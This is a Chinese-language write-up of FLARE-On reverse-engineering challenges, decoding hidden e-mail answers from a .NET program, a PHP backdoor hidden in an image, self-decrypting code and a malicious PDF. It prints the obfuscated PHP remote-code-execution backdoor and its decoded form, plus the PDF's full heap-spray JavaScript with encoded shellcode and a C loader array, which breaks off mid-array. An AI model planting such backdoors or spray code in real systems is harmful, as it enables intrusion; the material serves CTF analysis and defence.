The FLARE On Challenge題解
第一題
這個題目是個 .Net 程式, 要求根據這個程式找出一個郵箱地址, 然後給其發郵件, 它就會回覆你下一個題目.
首先, 這個程式是個64位的自解壓程式, 然後, 解壓出來後是個 .Net 程式.
拖到 ILSpy 中看了看, 沒有發現什麼機關, 答案應該透過函式 btnDecode_Click
獲取, 於是將函式 btnDecode_Click
扣出來, 列印中間變數, 第一步轉換就是結果了, 其郵箱地址為:
[email protected]
附原始碼:
#!c#
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace flare_on_1
{
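class Program
{
    // Contents of the Resources.dat_secret blob read by the original WinForms
    // handler, pasted inline so the decoder runs as a plain console program.
    private static readonly byte[] Secret =
    {
        0xA1, 0xB5, 0x44, 0x84, 0x14, 0xE4, 0xA1, 0xB5, 0xD4, 0x70, 0xB4, 0x91, 0xB4, 0x70, 0xD4, 0x91,
        0xE4, 0xC4, 0x96, 0xF4, 0x54, 0x84, 0xB5, 0xC4, 0x40, 0x64, 0x74, 0x70, 0xA4, 0x64, 0x44
    };

    /// <summary>
    /// Stage 1 of the decoder: swap the two nibbles of each byte, then XOR
    /// the result with 0x29. This stage alone already yields the readable address.
    /// </summary>
    /// <param name="buffer">Bytes to decode; an empty array yields "".</param>
    /// <returns>One char per input byte, in input order.</returns>
    internal static string SwapNibblesAndXor(byte[] buffer)
    {
        var sb = new StringBuilder(buffer.Length);
        foreach (byte b in buffer)
        {
            int swapped = (b >> 4) | ((b << 4) & 0xF0);
            sb.Append((char)(swapped ^ 0x29));
        }
        return sb.ToString();
    }

    /// <summary>
    /// Stage 2: exchange every adjacent pair of characters ("abcd" -> "badc").
    /// </summary>
    /// <param name="s">Input; the caller pads it to even length with '\0'.
    /// A trailing unpaired character is dropped instead of being indexed past the end.</param>
    /// <returns>The pair-swapped string.</returns>
    internal static string SwapPairs(string s)
    {
        var sb = new StringBuilder(s.Length);
        for (int i = 0; i + 1 < s.Length; i += 2)
        {
            sb.Append(s[i + 1]).Append(s[i]);
        }
        return sb.ToString();
    }

    /// <summary>
    /// Stage 3: XOR the low byte of every character with <paramref name="key"/>.
    /// The original handler displayed this value in lbl_title.
    /// </summary>
    /// <param name="s">Input string.</param>
    /// <param name="key">XOR key (0x66 in the challenge).</param>
    /// <returns>The transformed string, same length as <paramref name="s"/>.</returns>
    internal static string XorEach(string s, int key)
    {
        var sb = new StringBuilder(s.Length);
        foreach (char ch in s)
        {
            // The (byte) cast keeps the original's truncation to the low 8 bits.
            sb.Append((char)((byte)ch ^ key));
        }
        return sb.ToString();
    }

    //private void btnDecode_Click(object sender, EventArgs e)
    /// <summary>
    /// Console port of the form's Decode button: runs the three stages on the
    /// embedded secret and prints the stage-1 result, which is the answer.
    /// </summary>
    static void btnDecode_Click()
    {
        //this.pbRoge.Image = Resources.bob_roge;
        //byte[] buffer = Resources.dat_secret;
        // The NUL terminator makes the length even for the pair swap below.
        string str = SwapNibblesAndXor(Secret) + "\0";
        Console.WriteLine(str);
        string str2 = SwapPairs(str);
        // Computed so the full pipeline still runs; the form displayed it,
        // this console port does not.
        string str3 = XorEach(str2, 0x66);
        //this.lbl_title.Text = str3;
    }

    static void Main(string[] args)
    {
        btnDecode_Click();
    }
}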
}
第二題
提示說站點被黑了, 在 home.html 原始碼中看到這個:
<?php include "img/flare-on.png" ?>
圖片中的PHP程式碼:
#!php
<?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 
63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);$do_me="";for($i=0;$i<count($order);$i++){$do_me=$do_me.$terms[$order[$i]];}eval($do_me); ?>
將 $do_me
輸出並格式化:
#!php
// Stage 2 of the dropper: this is the string the eval($do_me) in the image built.
// $_   : base64 of the backdoor body (shown decoded further down the page).
$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
// $__  : base64 of "$code=base64_decode($_);eval($code);", a loader for $_.
$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
// $___ : the function name "base64_decode" spelled with octal/hex escapes so
//        the literal never appears in the file (defeats naive grep/signature scans).
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
// Runs the loader, which runs the backdoor. eval() of the result of a
// dynamically named function is itself a strong indicator when triaging web roots.
eval($___($__));
OK, 解析 $___
和 $__
:
#!php
$___ = "base64_decode"
$__ = "$code=base64_decode($_);eval($code);"
按照要求將變數 $_
按照 BASE64 解碼:
#!php
// Decoded backdoor. If the request carries a POST parameter whose name is the
// escaped string below (it decodes to the e-mail address), the parameter's value
// is base64-decoded and executed with eval(): remote code execution for anyone
// who knows the parameter name. Triage indicators: eval(base64_decode($_POST[...]))
// in web content, "<?php" inside image files, and include of a non-PHP file as at
// the top of this section. A host with this present should be treated as
// compromised and rebuilt from a known-good source.
if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }
字串 \97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D
為: a11DOTthatDOTjava5crapATflareDASHonDOTcom
替換大寫字母:
[email protected]
注意: 是 a11
(數字11) 而不是 all
.
第三題
這個就是傳說中的混淆/免殺/反逆向??? 這個程式在 IDA 中只能看到一個長長的賦值/重寫程式的程式碼. 拖到OD中, 發現程式在執行時不斷的解密/重寫程式, 最終在記憶體中生成郵箱地址並彈窗.
#!bash
0012FD21 42 72 6F 6B 65 6E 42 79 74 65 00 E6 FE 12 00 61 BrokenByte.纊.a
0012FD31 61 61 61 61 61 6E 64 20 69 27 6D 20 73 70 65 6E aaaaand i'm spen
0012FD41 74 00 00 7C FE 12 00 6F 6D 67 20 69 73 20 69 74 t..|?.omg is it
0012FD51 20 61 6C 6D 6F 73 74 20 6F 76 65 72 3F 21 3F 29 almost over?!?)
0012FD61 FE 12 00 C6 FD 12 00 6E 6F 70 61 73 61 75 72 75 ?.訖.nopasauru
0012FD71 73 00 00 84 FD 12 00 9D 24 40 00 90 B2 23 E8 00 s..匌.?@.惒#?
0012FD81 00 00 00 8B 34 24 83 C6 1C B9 DF 01 00 00 83 F9 ...?$兤慣..凒
0012FD91 00 74 07 80 36 66 46 49 EB F4 E9 10 00 00 00 61 .t€6fFI媵?...a
0012FDA1 6E 64 20 73 6F 20 69 74 20 62 65 67 69 6E 73 68 nd so it beginsh
0012FDB1 75 73 00 00 68 73 61 75 72 68 6E 6F 70 61 89 E3 us..hsaurhnopa夈
0012FDC1 E8 00 00 00 00 8B 34 24 83 C6 2D 89 F1 81 C1 8C ?...?$兤-夞伭
0012FDD1 01 00 00 89 D8 83 C0 0A 39 D8 75 05 89 E3 83 C3 ..壺兝.9豼夈兠
0012FDE1 04 39 CE 74 08 8A 13 30 16 43 46 EB EB E9 31 00 9蝨?0CF腚?.
0012FDF1 00 00 67 65 74 20 72 65 61 64 79 20 74 6F 20 67 ..get ready to g
0012FE01 65 74 20 6E 6F 70 27 65 64 20 73 6F 20 64 61 6D et nop'ed so dam
0012FE11 6E 20 68 61 72 64 20 69 6E 20 74 68 65 20 70 61 n hard in the pa
0012FE21 69 6E 74 E8 00 00 00 00 8B 34 24 83 C6 1E B9 38 int?...?$兤?
0012FE31 01 00 00 83 F9 00 7E 0E 81 36 62 4F 6C 47 83 C6 ..凒.~?bOlG兤
0012FE41 04 83 E9 04 EB ED 8D 80 00 00 00 00 8D 80 00 00 冮腠崁....崁..
0012FE51 00 00 90 90 90 90 68 72 3F 21 3F 68 20 6F 76 65 ..悙悙hr?!?h ove
0012FE61 68 6D 6F 73 74 68 74 20 61 6C 68 69 73 20 69 68 hmostht alhis ih
0012FE71 6F 6D 67 20 89 E3 E8 00 00 00 00 8B 34 24 83 C6 omg 夈?...?$兤
0012FE81 2D 89 F1 81 C1 D6 00 00 00 89 D8 83 C0 18 39 D8 -夞伭?..壺兝9
0012FE91 75 05 89 E3 83 C3 04 39 CE 74 08 8A 13 30 16 43 u夈兠9蝨?0C
0012FEA1 46 EB EB E9 1D 00 00 00 73 75 63 68 2E 35 68 33 F腚?...such.5h3
0012FEB1 31 31 30 31 30 31 30 31 40 66 6C 61 72 65 2D 6F [email protected]
0012FEC1 6E 2E 63 6F 6D 68 6E 74 00 00 68 20 73 70 65 68 n.comhnt..h speh
郵箱地址:
[email protected]
第四題
APT攻擊, 透過利用Adobe PDF Reader的JS函式漏洞構造堆噴射執行shellcode...
下面這段JS程式碼就是從這個PDF中提取出來的:
#!javascript
// Two string accumulators. HdPN is not referenced in the excerpt shown; the
// second one collects the filler for the second spray region built further down.
var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b
2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
// Spray region 1. The shape below is what PDF/JS sandboxes and static rules key
// on: a short %u-encoded unescape() pattern repeated in a countdown loop and
// prepended to the shellcode string (IxTUQnOvHg).
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
// Filler is doubled until it covers 20 + payload length, then one block is grown
// by self-concatenation until it approaches 0x40000 chars.
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS+ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length<fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY+=OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY;
UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length-fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
while(MOysyGgYplwyZzNdETHwkru.length+fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru+MOysyGgYplwyZzNdETHwkru+UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb;
// 100 copies of block + payload kept alive in an array: large arrays of
// near-identical strings are the other classic spray indicator.
DPwxazRhwbQGu = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=0;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA<100;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv;
// Spray region 2: same construction with a different 4-byte pattern and no
// payload appended, 125 blocks. Reader-side mitigations that blunt this whole
// pattern are disabling PDF JavaScript and running the reader sandboxed.
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=142;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166");
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length-bGtvKT);
while(QCZabMzxQiD.length+bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD+QCZabMzxQiD+Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=0;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA<125;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
OK, 變數 IxTUQnOvHg
儲存的就是 shellcode 了, 寫了個python程式, 將該變數的值轉換為16進位制的shellcode, 然後再用C語言寫了個程式, 呼叫這個shellcode, 然後可以用OD除錯. 一步步跟蹤直到呼叫 MessageBoxA 函式彈出視窗顯示郵箱地址. 然而更簡單的方法是直接分析 shellcode, 將shellcode拖到IDA中, 反彙編, 看彙編程式碼, 發現下面這個地方有這麼多的 push
和 xor
指令, 肯定有貓膩, 之後用OD跟進去除錯一下就好了...
#!bash
0048335E 8B1424 mov edx, dword ptr ss:[esp]
00483361 8172 0B 16A3FB3>xor dword ptr ds:[edx+0xB], 0x32FBA316
00483368 68 6F6D4500 push hello.00456D6F
0048336D 8172 17 AE45CF4>xor dword ptr ds:[edx+0x17], 0x48CF45AE
00483374 68 6F6E2E63 push 0x632E6E6F
00483379 8172 23 10369FD>xor dword ptr ds:[edx+0x23], 0xD29F3610
00483380 68 6172652D push 0x2D657261
00483385 8172 2F F7A9A90>xor dword ptr ds:[edx+0x2F], 0xCA9A9F7
0048338C 68 7340666C push 0x6C664073
00483391 8172 3B BE93A94>xor dword ptr ds:[edx+0x3B], 0x43A993BE
00483398 68 6C303174 push 0x7431306C
0048339D 8172 47 828A623>xor dword ptr ds:[edx+0x47], 0x3B628A82
004833A4 68 6D2E7370 push 0x70732E6D
004833A9 8172 53 D647C0C>xor dword ptr ds:[edx+0x53], 0xCCC047D6
004833B0 68 682E6433 push 0x33642E68
004833B5 8172 5F A3CA543>xor dword ptr ds:[edx+0x5F], 0x3154CAA3
004833BC 68 77613163 push 0x63316177
004833C1 8BCC mov ecx, esp
此時已經可以直接看到郵箱地址了, 郵箱地址是:
[email protected]
隨後的程式碼是呼叫 MessageBoxA
彈視窗的, 預設情況會將郵箱地址與 0x46454542 異或, 可以直接跳過, 這樣彈窗就可以列印郵箱地址了:
#!bash
004833C3 57 push edi
004833C4 53 push ebx
004833C5 51 push ecx
004833C6 57 push edi
004833C7 8BF1 mov esi, ecx
004833C9 89F7 mov edi, esi
004833CB 83C7 1E add edi, 0x1E
004833CE 39FE cmp esi, edi
004833D0 7D 0B jge short hello.004833DD
004833D2 8136 42454546 xor dword ptr ds:[esi], 0x46454542
004833D8 83C6 04 add esi, 0x4
004833DB ^ EB F1 jmp short hello.004833CE
004833DD FFD0 call eax ; user32.MessageBoxA
附C語言程式碼:
#!c
#include <stdio.h>
unsigned char shellcode[1024] = {
0xF9, 0x72, 0x49, 0x46, 0x25, 0x15, 0x0D, 0x7F, 0x3C, 0x3D, 0x84, 0xE0, 0x2A, 0xD6, 0x39, 0xE1,
0x4A, 0xA8, 0xB9, 0x76, 0x24, 0x98, 0x78, 0x73, 0x71, 0x7D, 0x7F, 0x75, 0x76, 0x20, 0xD4, 0x96,
0x91, 0xBA, 0x70, 0x19, 0xF9, 0xB8, 0x32, 0xE2, 0x7B, 0x46, 0xA8, 0x9B, 0x01, 0xFE, 0xC6, 0xC7,
0xC1, 0xE3, 0x24, 0x7E, 0x7C, 0x43, 0x80, 0xE1, 0x15, 0xB1, 0xB2, 0xB3, 0x66, 0x4F, 0xB6, 0x27,
0x3C, 0x9F, 0x4E, 0x7A, 0x2D, 0x41, 0xBF, 0xBB, 0x05, 0x77, 0x28, 0xF5, 0x93, 0x92, 0x90, 0x99,
0x98, 0xA9, 0x47, 0x0A, 0xEB, 0x14, 0x49, 0x3D, 0x4B, 0x48, 0x2F, 0x37, 0x8D, 0xB9, 0x78, 0x34,
0xB4, 0x0B, 0xD2, 0xD5, 0x31, 0xE0, 0x72, 0x35, 0x10, 0xD6, 0x40, 0x67, 0xBE, 0x2B, 0xFD, 0x4A,
0x1C, 0x04, 0x97, 0x3F, 0x3A, 0xFC, 0x79, 0x74, 0x1D, 0x42, 0xB5, 0xB7, 0x2C, 0x0C, 0x0D, 0x13,
0xF8, 0x25, 0xB0, 0x76, 0x79, 0x4E, 0xB1, 0x7B, 0x66, 0x0C, 0xBB, 0x2D, 0x1C, 0x91, 0x2F, 0xA9,
0x2C, 0xB8, 0xB0, 0x8D, 0x7E, 0x0D, 0x96, 0x3B, 0xD4, 0x49, 0x6B, 0xD5, 0xB7, 0x03, 0xF7, 0xE1,
0x7D, 0x46, 0xB9, 0x77, 0x42, 0x3D, 0x1D, 0x11, 0xE0, 0x67, 0x92, 0x4B, 0x85, 0xEB, 0x71, 0x24,
0x48, 0x9B, 0x02, 0xF9, 0x15, 0x4F, 0xBA, 0x04, 0x00, 0xE3, 0x27, 0x87, 0xD6, 0x9F, 0x70, 0x47,
0x7A, 0x18, 0xE2, 0x73, 0x1B, 0xFD, 0x74, 0x25, 0x7C, 0x43, 0x90, 0x41, 0xB6, 0x97, 0x99, 0x14,
0x3C, 0x78, 0x37, 0x83, 0xF8, 0xB3, 0x35, 0x72, 0x3F, 0x69, 0xF5, 0x98, 0xBE, 0x7F, 0x75, 0x4A,
0x93, 0xB4, 0xA8, 0xB5, 0xBF, 0x21, 0xD0, 0xFC, 0x40, 0x34, 0x7B, 0x05, 0xB2, 0xB2, 0x71, 0x7C,
0x4E, 0x81, 0xE1, 0x22, 0xEB, 0x04, 0x4A, 0x88, 0xE2, 0x2C, 0x2D, 0x49, 0x42, 0x8D, 0xB3, 0x75,
0x23, 0xF5, 0x7F, 0x72, 0x0B, 0xFC, 0x97, 0x01, 0xF7, 0xD3, 0xF9, 0x90, 0xBE, 0x41, 0x1C, 0xA8,
0x25, 0x7D, 0x35, 0xB1, 0x78, 0x79, 0x0A, 0xF8, 0x32, 0xFD, 0x9B, 0x76, 0x1D, 0x92, 0xB4, 0xBB,
0xB8, 0x77, 0x7E, 0x70, 0x73, 0x40, 0x7A, 0x0C, 0x89, 0xD6, 0x91, 0x24, 0x46, 0x14, 0xBA, 0x9F,
